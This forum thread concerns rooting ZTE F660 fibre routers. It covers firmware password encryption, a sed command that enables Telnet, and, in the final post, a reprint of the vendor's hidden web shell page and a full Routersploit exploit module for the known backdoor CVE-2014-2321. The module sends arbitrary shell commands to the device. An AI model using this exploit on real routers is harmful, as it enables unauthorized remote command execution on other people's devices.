ZTE ZXHN F660 - Power to the masses

Newtman
Мнения: 3
Регистриран на: 02 май 2018 04:22

Re: ZTE ZXHN F660 - Power to the masses

Мнение от Newtman » 22 авг 2018 14:24

Hello,
We have another problem, I have got F660v5 running firmware "t38" and the passwords are encrypted! When you print infirmation with sendcmd (by TTL) passwords are in asterisk.
I rolled back to the first FW and I got the passwords without problem but is different in the latest firmware.
I guess the new F670 have got the encryption too.

Do you know something about this?

Потребителски аватар
error_404
Глобален модератор
Мнения: 347
Регистриран на: 22 дек 2012 10:58

Re: ZTE ZXHN F660 - Power to the masses

Мнение от error_404 » 22 авг 2018 20:09

Hi,
first of all I only have F660 and for this reason I cannot give feedback for F670.
If in the new firmware the password is encrypted you can change it as root and create another user with Telnet access!

Код: Избери всички

sed -i "s|TS_Enable" val="0"|TS_Enable" val="1"|g" /userconfig/cfg/db_default_cfg.xml
of course with root which you mention you've gained
:evil:
Изображение
"За мен най-лошото в България е чудесното наслаждение, което тук имат хората да се преследват един друг и да развалят един другиму работата."
К.Иречек, 13.12.1881

Newtman
Мнения: 3
Регистриран на: 02 май 2018 04:22

Re: ZTE ZXHN F660 - Power to the masses

Мнение от Newtman » 23 авг 2018 15:35

error_404 написа:
22 авг 2018 20:09
Hi,
first of all I only have F660 and for this reason I cannot give feedback for F670.
If in the new firmware the password is encrypted you can change it as root and create another user with Telnet access!

Код: Избери всички

sed -i "s|TS_Enable" val="0"|TS_Enable" val="1"|g" /userconfig/cfg/db_default_cfg.xml
of course with root which you mention you've gained
:evil:
Yes, I know. I changed the password but I want an easy way to access as admin without open the ONT...In consecuence, know the original password.
Do you know where's is stored the hash?

Thanks!

Newtman
Мнения: 3
Регистриран на: 02 май 2018 04:22

Re: ZTE ZXHN F660 - Power to the masses

Мнение от Newtman » 02 фев 2019 22:55

Today I found a new firmware on F660 v5.2... V5.2.10P3T52 :thumbdown:
I can't enter by TTL because now root/root don't work anymore. Telnet is closed by LAN too...

I think we haven't got more options now, what do you think?

My idea now is dump the NAND, is a F59L1G81MA. I have got a pair of "universal" programmers, I need the socket now.

Потребителски аватар
error_404
Глобален модератор
Мнения: 347
Регистриран на: 22 дек 2012 10:58

For historic archive: WebShell Command Exploit

Мнение от error_404 » 12 юни 2019 20:30

Just Путин some exploit which was not working anymore, but for historic reasons and knowledge!

https://blog.rapid7.com/2014/03/03/disc ... -backdoor/
http://cve.mitre.org/cgi-bin/cvename.cg ... -2014-2321
https://www.kb.cert.org/vuls/id/600724/

web_shell_cmd.gch
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>
F660 Webshell
</title>
<LINK REL="stylesheet" HREF="css/login.css" TYPE="text/css" />
<LINK REL="stylesheet" HREF="css/template.css" TYPE="text/css" />
<style>
* {
margin: 0 0 0 0;
padding: 0;
}
.textarea_1 {
height:420px;
width:794px;
border:1px solid #7F9DB7;
font-size: 12px;
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
text-align:left;
}
#e8_container {
margin: 0 auto;
width: 800px;
text-align: left;
position: relative;
min-height: 600px;
height: 600px;
height: 600px;
}
#banner {
width:800px;
height:70px;
}
.bottom_td3 {
width:800px;
background-color:#eeeeee;
margin-right:2px;
text-align:right;
}
.copyright {
float:left;
display:block;
height:16px;
width:800px;
padding-top:10px;
border-left:1px solid #B1B1B1;
border-right:1px solid #B1B1B1;
text-align:center;
}
.bottom_line {
float:left;
display:block;
background-color:#5aa929;
height:8px;
width:800px;
}
.type{
position:absolute;
top:32px;left:540px;
font:20px Arial,sans-serif;
color:#fff;z-index:999;
}
.inputId {
width:720px;
}
table.table td.td11 {
width:30%;
height:24px;
text-align:right;
}
</style>
<script language="javascript">

function getObj(id) {
return (document.getElementById(id));
}

function jslSetValue(src, dst) {
var ss = document.getElementById(dst).value;
document.getElementById(src).value = ss;
}

function setValue(id, value) {
document.getElementById(id).value = value;
}

function Transfer_meaning(id, value) {
document.getElementById(id).value = value;
}
function getValue(id) {
return (document.getElementById(id).value);
}

function jslDisable(id) {
var i;
var num = jslDisable.arguments.length;
if (num == 0) return;
for (i = 0; i < num; i++) {
document.getElementById(arguments).disabled = true;
}
}
var CMD_PARA = new Array(
"Cmd",
"CmdAck"
);
function pageLoad(url) {
getObj("running").style.display = "none";
}
function pageSetValue() {
jslSetValue("Cmd", "Frm_Cmd");
}
function pageSubmit() {
jslDisable("Btn_Submit");
pageSetValue();
setValue("IF_ACTION", "apply");
getObj("running").style.display = "";
getObj("running_title").innerHTML = "it is running, please wait...";
getObj("fSubmit").submit();
}
</script>
<%
IMPORT FILE "common_gch.gch";
var FP_ERRORSTR = "SUCC";
var FP_PARANUM = 2;
var PARA[2] =
{
"Cmd",
"CmdAck"
};

create_form_start("fSubmit", "'/web_shell_cmd.gch'");
createBasicHidden();
create_hidden_newpara(PARA, FP_PARANUM);
var CmdAck="";
var Cmd = request("Cmd");
var FP_ACTION = request("IF_ACTION");
if(FP_ACTION == "apply")
{
CmdAck = show_shellcmd(Cmd);
}
getDisplayInstError(FP_ERRORSTR);
undoDBSave();

create_form_end();
%>
</head>

<body>
<div id="e8_container" style="background-color:#eeeeee;">
<div id="head">
<div id="banner" style="background-image:url(img/banner.gif); background-repeat:no-repeat"></div>
</div>
<table class="table" width="500px" border="0" align="center">
<tr>
</tr>
<tr id="running" class="white" style="display: none;">
<td>
<font id="running_title" style="display: ;"></font>&nbsp;&nbsp;<img src="img/uploading.gif">
</td>
</tr>
<tr>
<td class="td3" colspan="2">
</td>
</tr>
<tr>
<td class="td11" id="Fnt_Cmd">Command: </td>
<td class="td2">
<input name="textfield22" type="text" id="Frm_Cmd" class="inputId" value="" size="150" />
</td>
</tr>
<tr>
<td colspan="2" align="right">
<input name='Submit' type='button' id='Btn_Submit' onclick=pageSubmit() class='button' value=' Submit ' /></td>
</tr>
<br>
<tr>
<td class="td3" colspan="2">
<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1"><%=CmdAck;%></textarea>
</td>
</tr>
</table>
<br>
</div>
</body>

</html>


Routersploit Module
f460_f660_backdoor.py

import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
__info__ = {
"name": "ZTE F460 & F660 Backdoor RCE",
"description": "Exploits ZTE F460 and F660 backdoor vulnerability that allows "
"executing commands on operating system level.",
"authors": (
"Rapid7", # vulnerabilty discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"references": (
"https://community.rapid7.com/community/ ... h-backdoor",
),
"devices": (
"ZTE F460",
"ZTE F660",
),
}

target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")

def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop")
shell(self)
else:
print_error("Exploit failed - target seems to be not vulnerable")

def execute(self, cmd):
data = {
"IF_ACTION": "apply",
"IF_ERRORSTR": "SUCC",
"IF_ERRORPARAM": "SUCC",
"IF_ERRORTYPE": "-1",
"Cmd": cmd,
"CmdAck": ""
}

response = self.http_request(
method="POST",
path="/web_shell_cmd.gch",
data=data
)
if response is None:
return ""

if response.status_code == 200:
regexp = '<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1">(.*?)</textarea>'
res = re.findall(regexp, response.text, re.DOTALL)

if len(res):
return res[0]

return ""

@mute
def check(self):
marker = utils.random_text(32)
cmd = "echo {}".format(marker)

response = self.execute(cmd)
if marker in response:
return True # target is vulnerable

return False # target is not vulnerable

Изображение
"За мен най-лошото в България е чудесното наслаждение, което тук имат хората да се преследват един друг и да развалят един другиму работата."
К.Иречек, 13.12.1881

Отговори